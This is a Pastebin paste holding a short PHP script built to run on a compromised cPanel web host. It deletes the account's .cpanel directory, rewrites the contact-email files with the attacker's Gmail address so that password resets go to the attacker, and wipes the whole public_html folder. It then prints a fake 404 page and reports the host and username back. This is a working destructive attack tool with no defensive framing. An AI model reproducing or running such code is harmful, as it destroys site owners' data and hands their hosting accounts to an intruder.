Advertisement
bioskopcgv

kodewpdb

Feb 26th, 2020
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. ##############################
  5. // $filt = getcwd();
  6. // $filt = shell_exec('pwd');
  7.  $filt =  __file__ ;
  8. // $filt = php_uname();
  9. ##############################
  10. $fuck = explode("/",$filt);
  11. $user = $fuck[2];
  12. $_7mar = $fuck[1];
  13. $azerty = $_SERVER["SERVER_NAME"];
  14. $abcd = dirname($_SERVER["PHP_SELF"]);
  15. $sexterss = $azerty.$abcd;
  16. $azzouz = $_SERVER['HTTP_HOST'];
  17. //$email666 = 'ggggggggggggggggggg'; //after
  18. $email666 = 'bioskopcgv@gmail.com'; //befor
  19. system("user=$(whoami) ; rm -rf /$_7mar/$user/.cpanel/ ; cd /$_7mar/$user/ ; rm .contactinfo ; echo 'email:$email666' >> .contactinfo ;");
  20. system("user=$(whoami) ; rm -rf /$_7mar/$user/.cpanel/ ; cd /$_7mar/$user/ ; rm .contactemail ; echo '$email666' >> .contactemail ;");
  21. $email = "$email666"; $wr = 'email:'.$email;
  22. $msg = "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['REQUEST_URI']." files was not found on this server.</p><h2 hidden>bioskopcgv@gmail.com</h2><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>";
  23. echo $msg;
  24. system("rm -rf /$_7mar/$user/public_html/*");
  25.  
  26. echo $_SERVER['HTTP_HOST']."|".$user."|";
  27.  
  28.  
  29.  
  30. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement